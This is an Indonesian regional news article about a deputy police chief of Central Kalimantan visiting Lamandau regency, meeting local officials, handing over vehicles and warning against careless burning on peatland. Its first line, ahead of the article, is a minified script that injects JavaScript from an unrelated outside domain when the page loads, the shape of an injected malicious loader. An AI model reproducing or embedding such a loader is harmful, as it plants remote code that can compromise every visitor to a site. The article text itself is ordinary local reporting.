(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Lamandau

Kunker di Lamandau, Ini Pesan Wakapolda Kalteng


KANALKALIMANTAN.COM, NANGA BULIK – Wakil Kepala Kepolisian Daerah (Wakpolda)Kalimantan Tengah (Kalteng) Brigjen Pol Muhammad Agung Budijono SIK MSi mengunjungi Kabupaten Lamandau, Jumat (17/3/2023) sore.

Kunjungan Wakapolda Kalteng diterima Bupati Lamandau Hendra Lesmana, Kapolres AKBP Bronto Budiyono, Dandim 1017/Lmd Dwi Dipoyono, beserta unsur Forkopimda Kabupaten Lamandau, di rumah dinas Bupati. Wakapolda sebagai pejabat baru beserta rombongan berbincang-bincang dan makan bersama dengan Forkopimda.

Wakapolda Kalteng Brigjen Pol Muhammad Agung Budijono mengatakan, kunjungan kerja di wilayah hukum Polda Kalteng ke seluruh wilayah bagian barat Kalteng.

“Mulai kemarin di Kobar, Sukamara kemudian ke Lamandau, kunjungan ini yang pertama kalinya sebagai warga baru di Polda Kalteng, tentunya ingin mengenal lebih jauh pemerintah daerah, Polres, Kodim dan stakeholder yang lain agar bersinergi dan mengenal kebudayaan yang selama ini telah berjalan di Kabupaten Lamandau,” bebernya.

 

Baca juga: Field Trip Mahasiswa Politeknik Lamandau ke Perkebunan Sawit

“Tujuan berkunjung ini dalam rangka percepatan ekonomi, melakukan persiapan kalau ada Karhutla, stunting dan penanganan yang lain-lainnya,” sebut Brigjen Pol Muhammad.

Wakapolda berpesan kepada masyarakat terkait Kathutla yang pertama berdoa agar tidak kebakaran. “Jangan membakar sembarangan dan kalo ada yang hobi memancing rokoknya jangan membuang sembarangan, itu juga potensi apalagi di lahan gambut terpercik sekali saja bisa menjadi api besar,” tutupnya.

Polda Kalteng berkesempatan menyerahkan 2 unit mobil untuk Kapolres Lamandau dan Kapolsek Sematu Jaya dan penandatanganan penyerahan surat tanah.

Bupati Lamandau berharap dengan adanya kunjungan kerja Wakapolda Kalteng ke Kabupaten Lamandau dapat memberikan motivasi bagi semua pihak untuk meningkatkan kinerja di berbagai aspek yang ada.

“Kami ucapkan selamat datang di Kabupaten Lamandau kepada Bapak Wakapolda Kalteng, Brigjen Pol Muhamad Agung Budijono beserta rombongan,” ungkap Bupati Lamandau Hendra Lesmana.

“Harapan kita dengan kerjasama yang baik Pemkab Lamandau dan semua pihak dapat mendorong percepatan pembangunan di berbagai aspek di Kabupaten Lamandau,” pungkasnya.(Kanalkalimantan.com/habibullah)

Reporter : habibullah
Editor : kk


Risa

Recent Posts

Kontrol Overpopulasi Kucing Beranak Pinak di Banjarbaru, 150 Pejantan Dikebiri

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 150 ekor kucing jantan di Kota Banjarbaru, Kalimantan Selatan (Kalsel) mendapat… Read More

1 jam ago

Dominasi Golkar di Rumah Banjar, Ini 55 Calon Terpilih Anggota DPRD Kalsel 2024-2029

KANALKALIMANTAN.COM, BANJARMASIN - Komisi Pemilihan Umum (KPU) Provinsi Kalimantan Selatan (Kalsel) resmi menetapkan perolehan kursi… Read More

2 jam ago

Serang Markas Polisi di Kobar Kalteng, Empat Lelaki Diringkus

KANALKALIMANTAN.COM, PANGKALAN BUN - Malam yang seharusnya tenang di Desa Pangkalan Banteng, Kabupaten Kotawaringin Barat… Read More

3 jam ago

Pj Bupati Kapuas Perpisahan dengan Dua Pejabat Purna Tugas

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi didampingi Pj Ketua TP PKK… Read More

4 jam ago

Curi Mobil Modus Duplikat Kunci, NY Diringkus Satreskrim Polresta Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN - Satuan Reskrim Polresta Banjarmasin meringkus seseorang lelaki berinisial NY (37) karena melakukan… Read More

19 jam ago

Sah! Ini 30 Calon Terpilih Anggota DPRD HSU 2024-2029

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) menetapkan 30 perolehan… Read More

22 jam ago

This website uses cookies.